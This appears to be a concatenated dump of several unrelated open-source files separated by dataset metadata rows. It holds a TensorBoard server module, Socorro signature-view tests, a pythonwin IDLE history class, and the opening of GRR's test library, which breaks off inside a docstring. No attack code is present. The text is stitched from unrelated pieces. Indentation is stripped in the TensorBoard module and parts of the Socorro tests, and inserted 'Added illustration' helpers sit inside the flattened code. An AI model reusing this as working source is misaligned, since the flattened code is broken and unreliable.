# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 1,
}
# How often to reload new data after the latest load (secs)
LOAD_INTERVAL = 60
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not os.path.isabs(path) and not gcs.IsGCSPath(path):
# Create absolute path out of relative one.
path = os.path.join(os.path.realpath('.'), path)
files[path] = run_name
return files
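# Added illustration (not part of the original module): a self-checking example
# of the spec format documented in ParseEventFilesSpec's docstring. The paths
# are hypothetical; absolute paths keep the result independent of the current
# working directory.
def _ExampleParseEventFilesSpec():
  assert ParseEventFilesSpec('train:/tmp/logs/train,/tmp/logs/eval') == {
      '/tmp/logs/train': 'train',
      '/tmp/logs/eval': None,
  }
  # A leading slash means the whole spec is a path, even if it contains colons.
  assert ParseEventFilesSpec('/foo:bar/baz') == {'/foo:bar/baz': None}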
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer,
path_to_run,
load_interval=LOAD_INTERVAL):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# Ensure the Multiplexer initializes in a loaded state before it adds runs
# So it can handle HTTP requests while runs are loading
multiplexer.Reload()
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
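# Added illustration (not part of the original module): a hypothetical wiring of
# the helpers above. `multiplexer` is assumed to be an EventMultiplexer built by
# the caller, as TensorBoard's entry point does; the logdir spec and port are
# made up.
def _ExampleServe(multiplexer):
  path_to_run = ParseEventFilesSpec('train:/tmp/logs/train,/tmp/logs/eval')
  StartMultiplexerReloadingThread(multiplexer, path_to_run)
  server = BuildServer(multiplexer, 'localhost', 6006)
  server.serve_forever()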
| apache-2.0 | -8,770,988,719,488,214,000 | 33.210526 | 80 | 0.698632 | false |
lonnen/socorro | webapp-django/crashstats/signature/tests/test_views.py | 1 | 32115 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
from urllib.parse import quote
import mock
import pyquery
from django.urls import reverse
from django.utils.encoding import smart_text
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
DUMB_SIGNATURE = 'hang | mozilla::wow::such_signature(smth*)'
class TestViews(BaseTestViews):
def setUp(self):
super().setUp()
        # Mock get_versions_for_product() so it doesn't hit supersearch and
        # break the supersearch mocking
self.mock_gvfp = mock.patch('crashstats.crashstats.utils.get_versions_for_product')
self.mock_gvfp.return_value = ['20.0', '19.1', '19.0', '18.0']
self.mock_gvfp.start()
def tearDown(self):
self.mock_gvfp.stop()
super().tearDown()
def test_signature_report(self):
url = reverse('signature:signature_report')
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert DUMB_SIGNATURE in smart_text(response.content)
assert 'Loading' in smart_text(response.content)
def test_signature_reports(self):
def mocked_supersearch_get(**params):
assert '_columns' in params
assert 'uuid' in params['_columns']
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
if 'product' in params:
results = {
"hits": [
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa1",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981,
"cpu_info": "FakeAMD family 20 model 42",
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa2",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981,
"cpu_info": "AuthenticAMD family 20 model 1",
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa3",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": None
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa4",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": None
}
],
"total": 4
}
results['hits'] = self.only_certain_columns(
results['hits'],
params['_columns']
)
return results
return {"hits": [], "total": 0}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results.
url = reverse('signature:signature_reports')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'date': '2012-01-01',
})
assert response.status_code == 200
assert 'table id="reports-list"' not in smart_text(response.content)
assert 'No results were found' in smart_text(response.content)
# Test with results.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf'
})
assert response.status_code == 200
assert 'table id="reports-list"' in smart_text(response.content)
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
assert '888981' in smart_text(response.content)
assert 'Linux' in smart_text(response.content)
assert '2017-01-31 23:12:57' in smart_text(response.content)
assert 'AMD' in smart_text(response.content)
assert 'Cpu info' not in smart_text(response.content)
# Test with a different columns list.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'_columns': ['build_id', 'platform'],
})
assert response.status_code == 200
assert 'table id="reports-list"' in smart_text(response.content)
# The build and platform appear
assert '888981' in smart_text(response.content)
assert 'Linux' in smart_text(response.content)
# The crash id is always shown
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
# The version and date do not appear
assert '1.0' not in smart_text(response.content)
assert '2017' not in smart_text(response.content)
# Test missing parameter.
response = self.client.get(url)
assert response.status_code == 400
response = self.client.get(url, {
'signature': '',
})
assert response.status_code == 400
def test_parameters(self):
def mocked_supersearch_get(**params):
# Verify that all expected parameters are in the URL.
assert 'product' in params
assert 'WaterWolf' in params['product']
assert 'NightTrain' in params['product']
assert 'address' in params
assert '0x0' in params['address']
assert '0xa' in params['address']
assert 'reason' in params
assert '^hello' in params['reason']
assert '$thanks' in params['reason']
assert 'java_stack_trace' in params
assert 'Exception' in params['java_stack_trace']
return {
"hits": [],
"facets": "",
"total": 0
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_reports')
response = self.client.get(
url, {
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf', 'NightTrain'],
'address': ['0x0', '0xa'],
'reason': ['^hello', '$thanks'],
'java_stack_trace': 'Exception',
}
)
assert response.status_code == 200
def test_signature_reports_pagination(self):
"""Test that the pagination of results works as expected"""
def mocked_supersearch_get(**params):
assert '_columns' in params
            # Make sure a negative page does not lead to a negative offset
            # value; instead it is treated as page 1, so no offset is added.
assert params.get('_results_offset') == 0
hits = []
for i in range(140):
hits.append({
"signature": "nsASDOMWindowEnumerator::GetNext()",
"date": "2017-01-31T23:12:57",
"uuid": i,
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"build_id": 888981
})
return {
"hits": self.only_certain_columns(hits, params['_columns']),
"facets": "",
"total": len(hits)
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_reports')
response = self.client.get(
url,
{
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf'],
'_columns': ['platform']
}
)
assert response.status_code == 200
assert '140' in smart_text(response.content)
# Check that the pagination URL contains all three expected parameters.
doc = pyquery.PyQuery(response.content)
next_page_url = str(doc('.pagination a').eq(0))
assert 'product=WaterWolf' in next_page_url
assert '_columns=platform' in next_page_url
assert 'page=2' in next_page_url
# Verify white spaces are correctly encoded.
# Note we use `quote` and not `quote_plus`, so white spaces are
# turned into '%20' instead of '+'.
assert quote(DUMB_SIGNATURE) in next_page_url
# Test that a negative page value does not break it.
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'page': '-1',
})
assert response.status_code == 200
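    def test_quote_encoding_example(self):
        """Added illustration, not part of the original suite.
        Documents the `quote` vs `quote_plus` behavior the assertion above
        relies on: `quote` encodes spaces as '%20' while `quote_plus` would
        use '+'.
        """
        from urllib.parse import quote_plus
        assert quote('hang | mozilla') == 'hang%20%7C%20mozilla'
        assert quote_plus('hang | mozilla') == 'hang+%7C+mozilla'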
def test_signature_aggregation(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert '_facets' in params
if 'product' in params['_facets']:
return {
"hits": [],
"facets": {
"product": [
{
"term": "windows",
"count": 42,
},
{
"term": "linux",
"count": 1337,
},
{
"term": "mac",
"count": 3,
},
]
},
"total": 1382
}
# the default
return {
"hits": [],
"facets": {
"platform": []
},
"total": 0
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results.
url = reverse('signature:signature_aggregation', args=('platform',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'Product' not in smart_text(response.content)
assert 'No results were found' in smart_text(response.content)
# Test with results.
url = reverse('signature:signature_aggregation', args=('product',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'Product' in smart_text(response.content)
assert '1337' in smart_text(response.content)
assert 'linux' in smart_text(response.content)
assert str(int(1337 / 1382 * 100)) in smart_text(response.content)
assert 'windows' in smart_text(response.content)
assert 'mac' in smart_text(response.content)
def test_signature_graphs(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert '_histogram.date' in params
assert '_facets' in params
if 'product' in params['_facets']:
return {
"hits": [],
"total": 4,
"facets": {
"product": [
{
"count": 4,
"term": "WaterWolf"
}
],
"histogram_date": [
{
"count": 2,
"term": "2015-08-05T00:00:00+00:00",
"facets": {
"product": [
{
"count": 2,
"term": "WaterWolf"
}
]
}
},
{
"count": 2,
"term": "2015-08-06T00:00:00+00:00",
"facets": {
"product": [
{
"count": 2,
"term": "WaterWolf"
}
]
}
}
]
}
}
return {
"hits": [],
"total": 0,
"facets": {
"platform": [],
"signature": [],
"histogram_date": []
}
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_graphs', args=('platform',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'application/json' in response['content-type']
struct = json.loads(response.content)
assert 'aggregates' in struct
assert len(struct['aggregates']) == 0
assert 'term_counts' in struct
assert len(struct['term_counts']) == 0
# Test with results
url = reverse('signature:signature_graphs', args=('product',))
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
assert 'application/json' in response['content-type']
struct = json.loads(response.content)
assert 'aggregates' in struct
assert len(struct['aggregates']) == 2
assert 'term_counts' in struct
assert len(struct['term_counts']) == 1
def test_signature_comments_no_permission(self):
"""Verify comments are not viewable without view_pii."""
url = reverse('signature:signature_comments')
response = self.client.get(url, {'signature': 'whatever'})
assert response.status_code == 403
def test_signature_comments(self):
def mocked_supersearch_get(**params):
assert '_columns' in params
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
assert 'user_comments' in params
assert params['user_comments'] == ['!__null__']
if 'product' in params:
results = {
"hits": [
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa1",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "hello there people!",
"useragent_locale": "locale1"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa2",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "I love Mozilla",
"useragent_locale": "locale2"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa3",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "this product is awesome",
"useragent_locale": "locale3"
},
{
"date": "2017-01-31T23:12:57",
"uuid": "aaaaaaaaaaaaa4",
"product": "WaterWolf",
"version": "1.0",
"platform": "Linux",
"user_comments": "WaterWolf Y U SO GOOD?",
"useragent_locale": "locale4"
}
],
"total": 4
}
results['hits'] = self.only_certain_columns(
results['hits'],
params['_columns']
)
return results
return {"hits": [], "total": 0}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
url = reverse('signature:signature_comments')
user = self._login()
user.groups.add(self._create_group_with_permission('view_pii'))
assert user.has_perm('crashstats.view_pii')
# Test with no results.
response = self.client.get(
url,
{'signature': DUMB_SIGNATURE}
)
assert response.status_code == 200
assert 'Crash ID' not in smart_text(response.content)
assert 'No comments were found' in smart_text(response.content)
# Test with results.
response = self.client.get(
url,
{'signature': DUMB_SIGNATURE, 'product': 'WaterWolf'}
)
assert response.status_code == 200
assert 'aaaaaaaaaaaaa1' in smart_text(response.content)
assert 'Crash ID' in smart_text(response.content)
assert 'hello there' in smart_text(response.content)
assert 'WaterWolf Y U SO GOOD' in smart_text(response.content)
assert 'locale1' in smart_text(response.content)
def test_signature_comments_pagination(self):
"""Test that the pagination of comments works as expected"""
def mocked_supersearch_get(**params):
assert '_columns' in params
if params.get('_results_offset') != 0:
hits_range = range(100, 140)
else:
hits_range = range(100)
hits = []
for i in hits_range:
hits.append({
"date": "2017-01-31T23:12:57",
"uuid": i,
"user_comments": "hi",
})
return {
'hits': self.only_certain_columns(hits, params['_columns']),
'total': 140
}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
user = self._login()
user.groups.add(self._create_group_with_permission('view_pii'))
assert user.has_perm('crashstats.view_pii')
url = reverse('signature:signature_comments')
response = self.client.get(
url,
{
'signature': DUMB_SIGNATURE,
'product': ['WaterWolf'],
}
)
assert response.status_code == 200
assert '140' in smart_text(response.content)
assert '99' in smart_text(response.content)
assert '139' not in smart_text(response.content)
# Check that the pagination URL contains all expected parameters.
doc = pyquery.PyQuery(response.content)
next_page_url = str(doc('.pagination a').eq(0))
assert 'product=WaterWolf' in next_page_url
assert 'page=2' in next_page_url
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'page': '2',
})
assert response.status_code == 200
assert '140' in smart_text(response.content)
assert '99' not in smart_text(response.content)
assert '139' in smart_text(response.content)
def test_signature_summary(self):
models.GraphicsDevice.objects.create(
vendor_hex='0x0086',
adapter_hex='0x1234',
vendor_name='Intel',
adapter_name='Device'
)
models.GraphicsDevice.objects.create(
vendor_hex='0x0086',
adapter_hex='0x1239',
vendor_name='Intel',
adapter_name='Other'
)
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
res = {
"hits": [],
"total": 4,
"facets": {
"platform_pretty_version": [
{
"count": 4,
"term": "Windows 7"
}
],
"cpu_arch": [
{
"count": 4,
"term": "x86"
}
],
"process_type": [
{
"count": 4,
"term": "browser"
}
],
"product": [
{
"count": 4,
"term": "WaterWolf",
"facets": {
"version": [
{
"term": "2.1b99",
"count": 2,
"facets": {
"cardinality_install_time": {
"value": 2
}
}
},
{
"term": "1.0",
"count": 2,
"facets": {
"cardinality_install_time": {
"value": 2
}
}
}
]
}
}
],
"flash_version": [
{
"count": 4,
"term": "1.1.1.14"
}
],
"adapter_vendor_id": [
{
"term": "0x0086",
"count": 4,
"facets": {
"adapter_device_id": [
{
"term": "0x1234",
"count": 2,
},
{
"term": "0x1239",
"count": 2,
}
]
}
}
],
"android_cpu_abi": [
{
"term": "armeabi-v7a",
"count": 4,
"facets": {
"android_manufacturer": [
{
"term": "ZTE",
"count": 4,
"facets": {
"android_model": [
{
"term": "roamer2",
"count": 4,
"facets": {
"android_version": [
{
"term": "15",
"count": 4,
}
]
}
}
]
}
}
]
}
}
],
"histogram_uptime": [
{
"count": 2,
"term": 0,
},
{
"count": 2,
"term": 60,
}
],
}
}
if '_histogram.date' in params:
res['facets']['histogram_date'] = [
{
"count": 2,
"term": "2015-08-05T00:00:00+00:00",
"facets": {
"exploitability": [
{
"count": 2,
"term": "high"
}
]
}
},
{
"count": 2,
"term": "2015-08-06T00:00:00+00:00",
"facets": {
"exploitability": [
{
"count": 2,
"term": "low"
}
]
}
}
]
return res
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_summary')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'version': '1.0',
})
assert response.status_code == 200
# Make sure all boxes are there.
assert 'Operating System' in smart_text(response.content)
assert 'Uptime Range' in smart_text(response.content)
assert 'Product' in smart_text(response.content)
assert 'Architecture' in smart_text(response.content)
assert 'Process Type' in smart_text(response.content)
assert 'Mobile Devices' in smart_text(response.content)
assert 'Graphics Adapter' in smart_text(response.content)
assert 'Flash™ Version' in smart_text(response.content)
        # Logged out users can't see exploitability
assert 'Exploitability' not in smart_text(response.content)
# Check that some of the expected values are there.
assert 'Windows 7' in smart_text(response.content)
assert 'x86' in smart_text(response.content)
assert 'WaterWolf' in smart_text(response.content)
assert '2.1b99' in smart_text(response.content)
assert 'browser' in smart_text(response.content)
assert '1.1.1.14' in smart_text(response.content)
assert '< 1 min' in smart_text(response.content)
assert '1-5 min' in smart_text(response.content)
assert 'ZTE' in smart_text(response.content)
assert 'Intel (0x0086)' in smart_text(response.content)
user = self._login()
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
        # Logged in users without the permission can't see exploitability
assert 'Exploitability' not in smart_text(response.content)
group = self._create_group_with_permission('view_exploitability')
user.groups.add(group)
assert user.has_perm('crashstats.view_exploitability')
response = self.client.get(url, {'signature': DUMB_SIGNATURE})
assert response.status_code == 200
# Logged in users with the permission can see exploitability
assert 'Exploitability' in smart_text(response.content)
def test_signature_summary_with_many_hexes(self):
def mocked_supersearch_get(**params):
assert 'signature' in params
assert params['signature'] == ['=' + DUMB_SIGNATURE]
adapters = [
{
'term': '0x{0:0>4}'.format(i),
'count': 1
}
for i in range(50)
]
vendors = [
{
'term': '0x{0:0>4}'.format(i),
'count': 50,
'facets': {
'adapter_device_id': adapters
}
}
for i in range(3)
]
res = {
'hits': [],
'total': 4,
'facets': {
'adapter_vendor_id': vendors,
}
}
return res
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
# Test with no results
url = reverse('signature:signature_summary')
response = self.client.get(url, {
'signature': DUMB_SIGNATURE,
'product': 'WaterWolf',
'version': '1.0',
})
assert response.status_code == 200
def test_signature_bugzilla(self):
models.BugAssociation.objects.create(
bug_id=111111,
signature='Something'
)
models.BugAssociation.objects.create(
bug_id=111111,
signature='OOM | small'
)
models.BugAssociation.objects.create(
bug_id=123456789,
signature='Something'
)
# Test with signature that has no bugs
url = reverse('signature:signature_bugzilla')
response = self.client.get(url, {
'signature': 'hang | mozilla::wow::such_signature(smth*)'
})
assert response.status_code == 200
assert 'There are no bugs' in smart_text(response.content)
# Test with signature that has bugs and related bugs
response = self.client.get(url, {
'signature': 'Something',
})
assert response.status_code == 200
assert '123456789' in smart_text(response.content)
assert '111111' in smart_text(response.content)
        # Because bug id 123456789 is greater than 111111, we expect that
        # order in the rendered output
content = smart_text(response.content)
assert (
content.find('123456789') <
content.find('111111') <
content.find('Related Crash Signatures') <
content.find('Bugs for <code>OOM | small</code>')
)
| mpl-2.0 | 2,714,568,946,903,695,400 | 36.737955 | 91 | 0.422077 | false |
leighpauls/k2cro4 | third_party/python_26/Lib/site-packages/pythonwin/pywin/idle/IdleHistory.py | 20 | 3101 | import string
class History:
def __init__(self, text, output_sep = "\n"):
self.text = text
self.history = []
self.history_prefix = None
self.history_pointer = None
self.output_sep = output_sep
text.bind("<<history-previous>>", self.history_prev)
text.bind("<<history-next>>", self.history_next)
def history_next(self, event):
self.history_do(0)
return "break"
def history_prev(self, event):
self.history_do(1)
return "break"
def _get_source(self, start, end):
# Get source code from start index to end index. Lines in the
        # text control may be separated by sys.ps2.
lines = string.split(self.text.get(start, end), self.output_sep)
return string.join(lines, "\n")
def _put_source(self, where, source):
output = string.join(string.split(source, "\n"), self.output_sep)
self.text.insert(where, output)
def history_do(self, reverse):
nhist = len(self.history)
pointer = self.history_pointer
prefix = self.history_prefix
if pointer is not None and prefix is not None:
if self.text.compare("insert", "!=", "end-1c") or \
self._get_source("iomark", "end-1c") != self.history[pointer]:
pointer = prefix = None
if pointer is None or prefix is None:
prefix = self._get_source("iomark", "end-1c")
if reverse:
pointer = nhist
else:
pointer = -1
nprefix = len(prefix)
while 1:
if reverse:
pointer = pointer - 1
else:
pointer = pointer + 1
if pointer < 0 or pointer >= nhist:
self.text.bell()
if self._get_source("iomark", "end-1c") != prefix:
self.text.delete("iomark", "end-1c")
self._put_source("iomark", prefix)
pointer = prefix = None
break
item = self.history[pointer]
if item[:nprefix] == prefix and len(item) > nprefix:
self.text.delete("iomark", "end-1c")
self._put_source("iomark", item)
break
self.text.mark_set("insert", "end-1c")
self.text.see("insert")
self.text.tag_remove("sel", "1.0", "end")
self.history_pointer = pointer
self.history_prefix = prefix
def history_store(self, source):
source = string.strip(source)
if len(source) > 2:
# avoid duplicates
try:
self.history.remove(source)
except ValueError:
pass
self.history.append(source)
self.history_pointer = None
self.history_prefix = None
def recall(self, s):
s = string.strip(s)
self.text.tag_remove("sel", "1.0", "end")
self.text.delete("iomark", "end-1c")
self.text.mark_set("insert", "end-1c")
self.text.insert("insert", s)
self.text.see("insert")
| bsd-3-clause | 1,576,524,727,443,946,200 | 33.842697 | 77 | 0.530474 | false |
spnow/grr | lib/test_lib.py | 1 | 60900 | #!/usr/bin/env python
"""A library for tests."""
import codecs
import functools
import itertools
import os
import pdb
import re
import shutil
import signal
import socket
import StringIO
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from M2Crypto import X509
from selenium.common import exceptions
from selenium.webdriver.common import keys
from selenium.webdriver.support import select
import logging
import unittest
from grr.client import actions
from grr.client import client_stats
from grr.client import comms
from grr.client import vfs
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import email_alerts
from grr.lib import flags
from grr.lib import flow
from grr.lib import maintenance_utils
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import registry
# Server components must also be imported even when the client code is tested.
# pylint: disable=unused-import
from grr.lib import server_plugins
# pylint: enable=unused-import
from grr.lib import startup
from grr.lib import utils
from grr.lib import worker
# pylint: disable=unused-import
from grr.lib.flows.caenroll import ca_enroller
# pylint: enable=unused-import
from grr.proto import flows_pb2
from grr.test_data import client_fixture
flags.DEFINE_list("tests", None,
help=("Test module to run. If not specified we run"
"All modules in the test suite."))
flags.DEFINE_list("labels", ["small"],
"A list of test labels to run. (e.g. benchmarks,small).")
class Error(Exception):
"""Test base error."""
class TimeoutError(Error):
"""Used when command line invocations time out."""
class FlowOrderTest(flow.GRRFlow):
"""Tests ordering of inbound messages."""
def __init__(self, *args, **kwargs):
self.messages = []
flow.GRRFlow.__init__(self, *args, **kwargs)
@flow.StateHandler(next_state="Incoming")
def Start(self, unused_message=None):
self.CallClient("Test", data="test",
next_state="Incoming")
@flow.StateHandler(auth_required=True)
def Incoming(self, responses):
"""Record the message id for testing."""
self.messages = []
for _ in responses:
self.messages.append(responses.message.response_id)
class SendingFlowArgs(rdfvalue.RDFProtoStruct):
protobuf = flows_pb2.SendingFlowArgs
class SendingFlow(flow.GRRFlow):
"""Tests sending messages to clients."""
args_type = SendingFlowArgs
@flow.StateHandler(next_state="Process")
def Start(self, unused_response=None):
"""Just send a few messages."""
for unused_i in range(0, self.args.message_count):
self.CallClient("ReadBuffer", offset=0, length=100, next_state="Process")
class BrokenFlow(flow.GRRFlow):
"""A flow which does things wrongly."""
@flow.StateHandler(next_state="Process")
def Start(self, unused_response=None):
"""Send a message to an incorrect state."""
self.CallClient("ReadBuffer", next_state="WrongProcess")
class WellKnownSessionTest(flow.WellKnownFlow):
"""Tests the well known flow implementation."""
well_known_session_id = rdfvalue.SessionID("aff4:/flows/test:TestSessionId")
messages = []
def __init__(self, *args, **kwargs):
flow.WellKnownFlow.__init__(self, *args, **kwargs)
def ProcessMessage(self, message):
"""Record the message id for testing."""
self.messages.append(int(message.args))
class MockSecurityManager(access_control.BaseAccessControlManager):
"""A simple in memory ACL manager which only enforces the Admin label.
This also guarantees that the correct access token has been passed to the
security manager.
Note: No user management, we assume a single test user.
"""
def CheckFlowAccess(self, token, flow_name, client_id=None):
_ = flow_name, client_id
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckHuntAccess(self, token, hunt_urn):
_ = hunt_urn
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckCronJobAccess(self, token, cron_job_urn):
_ = cron_job_urn
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
def CheckDataStoreAccess(self, token, subjects, requested_access="r"):
_ = subjects, requested_access
if token is None:
raise RuntimeError("Security Token is not set correctly.")
return True
class GRRBaseTest(unittest.TestCase):
"""This is the base class for all GRR tests."""
install_mock_acl = True
__metaclass__ = registry.MetaclassRegistry
include_plugins_as_attributes = True
# The type of this test.
type = "normal"
def __init__(self, methodName=None): # pylint: disable=g-bad-name
"""Hack around unittest's stupid constructor.
We sometimes need to instantiate the test suite without running any tests -
    e.g. to start initialization or setUp() functions. The unittest constructor
    requires a valid method name to be provided.
Args:
methodName: The test method to run.
"""
super(GRRBaseTest, self).__init__(methodName=methodName or "__init__")
def setUp(self):
super(GRRBaseTest, self).setUp()
# Make a temporary directory for test files.
self.temp_dir = tempfile.mkdtemp(dir=config_lib.CONFIG["Test.tmpdir"])
# Reinitialize the config system each time.
startup.TestInit()
config_lib.CONFIG.SetWriteBack(
os.path.join(self.temp_dir, "writeback.yaml"))
self.base_path = config_lib.CONFIG["Test.data_dir"]
self.token = access_control.ACLToken(username="test",
reason="Running tests")
if self.install_mock_acl:
# Enforce checking that security tokens are propagated to the data store
# but no actual ACLs.
data_store.DB.security_manager = MockSecurityManager()
logging.info("Starting test: %s.%s",
self.__class__.__name__, self._testMethodName)
def tearDown(self):
logging.info("Completed test: %s.%s",
self.__class__.__name__, self._testMethodName)
shutil.rmtree(self.temp_dir, True)
def shortDescription(self): # pylint: disable=g-bad-name
doc = self._testMethodDoc or ""
doc = doc.split("\n")[0].strip()
# Write the suite and test name so it can be easily copied into the --tests
# parameter.
return "\n%s.%s - %s\n" % (
self.__class__.__name__, self._testMethodName, doc)
def _EnumerateProto(self, protobuf):
"""Return a sorted list of tuples for the protobuf."""
result = []
for desc, value in protobuf.ListFields():
if isinstance(value, float):
value = round(value, 2)
try:
value = self._EnumerateProto(value)
except AttributeError:
pass
result.append((desc.name, value))
result.sort()
return result
def assertProtoEqual(self, x, y):
"""Check that an RDFStruct is equal to a protobuf."""
self.assertEqual(self._EnumerateProto(x), self._EnumerateProto(y))
def run(self, result=None): # pylint: disable=g-bad-name
"""Run the test case.
This code is basically the same as the standard library, except that when
there is an exception, the --debug flag allows us to drop into the raising
function for interactive inspection of the test failure.
Args:
result: The testResult object that we will use.
"""
